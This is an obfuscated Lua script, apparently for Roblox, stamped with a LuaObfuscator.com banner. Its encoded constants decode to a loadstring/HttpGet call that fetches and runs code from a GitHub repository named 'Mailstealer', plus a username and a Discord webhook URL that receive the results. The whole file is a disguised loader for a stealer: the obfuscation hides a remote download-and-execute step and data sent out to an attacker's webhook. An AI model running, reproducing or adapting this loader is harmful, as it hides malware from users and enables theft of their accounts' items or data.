--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v31,1,1));return "";end end else local v87=v2(v0(v31,16));if v20 then local v94=v5(v87,v20);v20=nil;return v94;else return v87;end end end);v21=nil;v18=1;end if (v18==3) then function v25()local v32=0 -(180 -(67 + 113)) ;local v33;local v34;local v35;local v36;local v37;local v38;while true do if (v32==(8 -5)) then if (v37==(0 -0)) then if (v36==(0 -0)) then return v38 * (619 -(555 + 64)) ;else local v103=931 -((2307 -1450) + 74) ;while true do if (v103==0) then v37=569 -((665 -298) + 201) ;v35=927 -(214 + 713) ;break;end end end elseif (v37==(1490 + 557)) then return ((v36==(0 + 0 + 0)) and (v38 * ((1 + 0)/(877 -(282 + 595))))) or (v38 * NaN) ;end return v8(v38,v37-1023 ) * (v35 + (v36/((1639 -(1523 + (1111 -(915 + 82))))^52))) ;end if (v32==0) then v33=v24();v34=v24();v32=1 + 0 ;end if (v32==((4 -2) -0)) then v37=v21(v34,1086 -(68 + (2823 -1826)) ,31);v38=((v21(v34,1302 -(226 + 1044) )==((3 + 1) -3)) and  -(118 -((41 -9) + 85))) or (1 + 0) ;v32=(1188 -(1069 + 118)) + 2 + 0 ;end if (v32==(958 -(892 + 65))) then v35=1;v36=(v21(v34,1,(186 -139) -27 ) * ((3 -(953 -(802 + 150)))^(58 -26))) + v33 ;v32=352 -(87 + 263) ;end end end v26=nil;function v26(v39)local v40=0;local v41;local v42;while true do if (v40==(4 -2)) then v42={};for v95=1 -0 , #v41 do v42[v95]=v2(v1(v3(v41,v95,v95)));end v40=(3 -2) + (444 -(416 + 26)) ;end if (v40==((0 -0) -0)) then v41=nil;if  not v39 then v39=v24();if (v39==(0 + 0)) then return "";end end v40=792 -(368 + 423) ;end if (v40==(3 -2)) then v41=v3(v16,v19,(v19 + v39) -1 );v19=v19 + v39 ;v40=20 -(10 + 8) ;end if (v40==3) then return v6(v42);end end end v27=v24;v18=4;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (4==v43) then v52=nil;while true do if (v44~=0) then else v45=0;v46=nil;v44=1;end if (v44~=3) then else local v101=0;while true do if (v101==1) then v44=4;break;end if (v101==(540 -(537 + 3))) then v51=nil;v52=nil;v101=1;end end end if (v44==4) then while true do if (v45==1) then v48=nil;v49=nil;v45=1702 -(1419 + 281) ;end if (v45==2) then v50=nil;v51=nil;v45=3;end if (v45~=3) then else v52=nil;while true do local v111=0 -0 ;while true do if (v111~=1) then else if ((74 -(71 + 3))==v46) then local v176=0;local v177;while true do if (v176==0) then v177=0 + 0 ;while true do if (v177==(4 -2)) then v46=1 -0 ;break;end if (v177~=(241 -(187 + 54))) then else local v180=780 -(162 + 618) ;while true do if (v180==(0 + 0)) then v47={};v48={};v180=1 + 0 ;end if (v180==(1 -0)) then v177=1;break;end end end if ((1 -0)~=v177) then else local v181=0;local v182;while true do if (v181~=0) then else v182=0;while true do if (v182==(0 + 0)) then local v189=0;while true do if (v189==0) then v49={};v50={v47,v48,nil,v49};v189=1001 -(451 + 549) ;end if (v189~=(1 + 0)) then else v182=1 -0 ;break;end end end if (v182==1) then v177=2;break;end end break;end end end end break;end end end break;end if (v111==(0 -0)) then local v156=0;local v157;while true do if (v156~=(1384 -(746 + 638))) then else v157=0 + 0 ;while true do if (v157==(1 -0)) then v111=342 -(218 + 123) ;break;end if ((1581 -(1535 + 46))==v157) then if (v46~=2) then else local v183=0;local v184;while true do if (v183==0) then v184=0;while true do local v188=0 + 0 ;while true do if (v188==0) then if (v184~=(0 + 0)) then else local v191=0;while true do if (v191==(561 -(306 + 254))) then v184=1;break;end if (v191==(0 + 0)) then for v198=1 -0 ,v24() do local v199=1467 -(899 + 568) ;local v200;local v201;while true do if (v199==1) then while true do if (v200==0) then v201=v22();if (v21(v201,1 + 0 ,2 -1 )==0) then local v207=603 -(268 + 335) ;local v208;local v209;local v210;local v211;local v212;while true do if (v207==1) then v210=nil;v211=nil;v207=2;end if ((292 -(60 + 230))==v207) then v212=nil;while true do if ((573 -(426 + 146))~=v208) then else v211=nil;v212=nil;v208=2;end if (v208==0) then local v213=0 + 0 ;while true do if (v213==(1457 -(282 + 1174))) then v208=812 -(569 + 242) ;break;end if (v213~=(0 -0)) then else v209=0;v210=nil;v213=1 + 0 ;end end end if ((1026 -(706 + 318))==v208) then while true do if (v209~=0) then else local v214=0;while true do if (v214~=0) then else local v222=0;while true do if (v222==(1252 -(721 + 530))) then v214=1272 -(945 + 326) ;break;end if (v222~=(0 -0)) then else v210=v21(v201,2,3 + 0 );v211=v21(v201,704 -(271 + 429) ,6 + 0 );v222=1;end end end if ((1501 -(1408 + 92))~=v214) then else v209=1087 -(461 + 625) ;break;end end end if (v209==(1291 -(993 + 295))) then if (v21(v211,1 + 2 ,1174 -(418 + 753) )==(1 + 0)) then v212[4]=v52[v212[1 + 3 ]];end v47[v198]=v212;break;end if (v209==(1 + 1)) then local v216=0 + 0 ;local v217;while true do if (v216~=0) then else v217=0;while true do if (v217==(530 -(406 + 123))) then v209=1772 -(1749 + 20) ;break;end if (v217==(0 + 0)) then local v224=1322 -(1249 + 73) ;while true do if (v224~=1) then else v217=1 + 0 ;break;end if (v224==(1145 -(466 + 679))) then if (v21(v211,2 -1 ,2 -1 )~=(1901 -(106 + 1794))) then else v212[2]=v52[v212[1 + 1 ]];end if (v21(v211,1 + 1 ,5 -3 )==(2 -1)) then v212[117 -(4 + 110) ]=v52[v212[3]];end v224=585 -(57 + 527) ;end end end end break;end end end if (v209~=1) then else v212={v23(),v23(),nil,nil};if (v210==(0 + 0)) then local v220=0 -0 ;local v221;while true do if (v220==(0 -0)) then v221=166 -(122 + 44) ;while true do if (v221==(0 -0)) then v212[3]=v23();v212[12 -8 ]=v23();break;end end break;end end elseif (v210==(1 + 0)) then v212[1 + 2 ]=v24();elseif (v210==(3 -1)) then v212[3]=v24() -((67 -(30 + 35))^(11 + 5)) ;elseif (v210~=(1260 -(1043 + 214))) then else local v228=0;while true do if (v228==0) then v212[11 -8 ]=v24() -((1214 -(323 + 889))^16) ;v212[4]=v23();break;end end end v209=5 -3 ;end end break;end end break;end if (v207==(580 -(361 + 219))) then v208=320 -(53 + 267) ;v209=nil;v207=1;end end end break;end end break;end if (v199==(0 + 0)) then v200=413 -(15 + 398) ;v201=nil;v199=983 -(18 + 964) ;end end end for v202=1,v24() do v48[v202-1 ]=v29();end v191=3 -2 ;end end end if (v184==1) then return v50;end break;end end end break;end end end if (1~=v46) then else local v185=0 + 0 ;while true do if (v185==(1 + 0)) then local v186=0;while true do if (v186==(851 -(20 + 830))) then v185=2 + 0 ;break;end if (0==v186) then local v190=0;while true do if (0~=v190) then else for v193=1,v51 do local v194=0;local v195;local v196;local v197;while true do if (v194==(126 -(116 + 10))) then v195=0;v196=nil;v194=1;end if (v194==1) then v197=nil;while true do if (v195==(0 + 0)) then local v204=738 -(542 + 196) ;local v205;while true do if (v204==(0 -0)) then v205=0;while true do if (v205~=(1 + 0)) then else v195=1 + 0 ;break;end if (v205~=0) then else v196=v22();v197=nil;v205=1 + 0 ;end end break;end end end if (v195==(2 -1)) then if (v196==(2 -1)) then v197=v22()~=(1551 -(1126 + 425)) ;elseif (v196==(407 -(118 + 287))) then v197=v25();elseif (v196~=(11 -8)) then else v197=v26();end v52[v193]=v197;break;end end break;end end end v50[1124 -(118 + 1003) ]=v22();v190=2 -1 ;end if (v190==1) then v186=378 -(142 + 235) ;break;end end end end end if (v185==0) then local v187=0 -0 ;while true do if (v187==0) then v51=v24();v52={};v187=1 + 0 ;end if (v187==1) then v185=978 -(553 + 424) ;break;end end end if (v185~=(3 -1)) then else v46=2 + 0 ;break;end end end v157=1 + 0 ;end end break;end end end end end break;end if (v45==0) then local v110=0;while true do if ((1 + 0)==v110) then v45=1 + 0 ;break;end if (v110==(0 + 0)) then v46=0;v47=nil;v110=2 -1 ;end end end end break;end if (v44~=1) then else v47=nil;v48=nil;v44=2;end if (v44==(5 -3)) then local v102=0 -0 ;while true do if ((1 + 0)==v102) then v44=14 -11 ;break;end if (v102~=(753 -(239 + 514))) then else v49=nil;v50=nil;v102=1 + 0 ;end end end end break;end if ((1330 -(797 + 532))==v43) then v46=nil;v47=nil;v43=2 + 0 ;end if (v43==(2 + 1)) then v50=nil;v51=nil;v43=9 -5 ;end if (v43~=(1202 -(373 + 829))) then else v44=0;v45=nil;v43=1;end if ((733 -(476 + 255))==v43) then v48=nil;v49=nil;v43=1133 -(369 + 761) ;end end end v18=5;end if (v18==1) then function v21(v53,v54,v55)if v55 then local v88=(v53/((2 + 0)^(v54-(1 -0))))%((3 -1)^(((v55-(1 + 0)) -(v54-(239 -(64 + 174)))) + 1 + 0)) ;return v88-(v88%(1 + 0)) ;else local v89=1504 -(363 + 1141) ;local v90;while true do if (v89==((1580 -(1183 + 397)) -0)) then v90=(338 -((438 -294) + 192))^(v54-(217 -(42 + 174))) ;return (((v53%(v90 + v90))>=v90) and 1) or (0 + 0) ;end end end end v22=nil;function v22()local v56=(1933 -(565 + 1368)) + 0 ;local v57;while true do if (v56==(0 + 0)) then v57=v1(v16,v19,v19);v19=v19 + (1976 -(1913 + 62)) ;v56=1 + 0 ;end if (v56==((7 -5) -1)) then return v57;end end end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v72=v61;local v73=v62;local v74=v63;local v75=v28;local v76=1;local v77= -1;local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v91=0,v80 do if (v91>=v74) then v78[v91-v74 ]=v79[v91 + 1 ];else v82[v91]=v79[v91 + 1 ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do v84=v72[v76];v85=v84[1];if (v85<=5) then if (v85<=2) then if (v85<=0) then local v104=0;local v105;local v106;while true do if (v104==1) then v82[v105 + 1 ]=v106;v82[v105]=v106[v84[4]];break;end if (0==v104) then v105=v84[2];v106=v82[v84[3]];v104=1;end end elseif (v85>1) then v82[v84[2]]();else local v112;local v113,v114;local v115;local v116;v60[v84[3]]=v82[v84[2]];v76=v76 + 1 ;v84=v72[v76];if ((v84[3]=="_ENV") or (v84[3]=="getfenv")) then v82[v84[2]]=v60;else v82[v84[2]]=v60[v84[3]];end v76=v76 + 1 ;v84=v72[v76];if ((v84[3]=="_ENV") or (v84[3]=="getfenv")) then v82[v84[2]]=v60;else v82[v84[2]]=v60[v84[3]];end v76=v76 + 1 ;v84=v72[v76];v116=v84[2];v115=v82[v84[3]];v82[v116 + 1 ]=v115;v82[v116]=v115[v84[4]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v116=v84[2];v113,v114=v75(v82[v116](v13(v82,v116 + 1 ,v84[3])));v77=(v114 + v116) -1 ;v112=0;for v142=v116,v77 do local v143=0;while true do if (v143==0) then v112=v112 + 1 ;v82[v142]=v113[v112];break;end end end v76=v76 + 1 ;v84=v72[v76];v116=v84[2];v82[v116]=v82[v116](v13(v82,v116 + 1 ,v77));v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]();v76=v76 + 1 ;v84=v72[v76];v76=v84[3];end elseif (v85<=3) then v82[v84[2]]=v84[3]~=0 ;elseif (v85==4) then if (v82[v84[2]]==v84[4]) then v76=v76 + 1 ;else v76=v84[3];end elseif ((v84[3]=="_ENV") or (v84[3]=="getfenv")) then v82[v84[2]]=v60;else v82[v84[2]]=v60[v84[3]];end elseif (v85<=8) then if (v85<=6) then local v108=0;local v109;while true do if (v108==0) then v109=v84[2];v82[v109]=v82[v109](v13(v82,v109 + 1 ,v77));break;end end elseif (v85>7) then v60[v84[3]]=v82[v84[2]];else do return;end end elseif (v85<=10) then if (v85>9) then v76=v84[3];else local v129=0;while true do if (v129==3) then v82[v84[2]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v129=4;end if (v129==2) then v60[v84[3]]=v82[v84[2]];v76=v76 + 1 ;v84=v72[v76];v129=3;end if (v129==1) then v82[v84[2]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v129=2;end if (v129==4) then v76=v84[3];break;end if (v129==0) then v60[v84[3]]=v82[v84[2]];v76=v76 + 1 ;v84=v72[v76];v129=1;end end end elseif (v85==11) then local v130=0;local v131;local v132;local v133;local v134;while true do if (v130==2) then for v174=v131,v77 do local v175=0;while true do if (v175==0) then v134=v134 + 1 ;v82[v174]=v132[v134];break;end end end break;end if (v130==1) then v77=(v133 + v131) -1 ;v134=0;v130=2;end if (v130==0) then v131=v84[2];v132,v133=v75(v82[v131](v13(v82,v131 + 1 ,v84[3])));v130=1;end end else v82[v84[2]]=v84[3];end v76=v76 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==2) then function v23()local v64=1661 -((1781 -(244 + 60)) + 184) ;local v65;local v66;while true do if (v64==(1 -0)) then return (v66 * (239 + 17)) + v65 ;end if (v64==0) then v65,v66=v1(v16,v19,v19 + (858 -(564 + 292)) );v19=v19 + (2 -(0 + 0)) ;v64=2 -1 ;end end end v24=nil;function v24()local v67=476 -((1179 -(782 + 356)) + 435) ;local v68;local v69;local v70;local v71;while true do if (v67==(1002 -(938 + 63))) then return (v71 * (12902972 + 3874244)) + (v70 * (66661 -(936 + 189))) + (v69 * (523 -(176 + 91))) + v68 ;end if (v67==(0 + (0 -0))) then v68,v69,v70,v71=v1(v16,v19,v19 + 3 );v19=v19 + (1617 -(1565 + 48)) ;v67=1 + 0 ;end end end v25=nil;v18=3;end end end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D65030B3O00626F6C756E33323133323103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313937383439362O323O373935342O33342F5A647A484464665579636737386B4668435A45366D47347074494A62545F67364B65612O576B4F65637A4F4746443850424E333564662D455646586661734C4D4368763400163O00120C3O00013O0026043O000D0001000200040A3O000D00012O0003000100013O001201000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026043O00010001000100040A3O0001000100120C000100093O001209000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00073O00017O00",v9(),...);
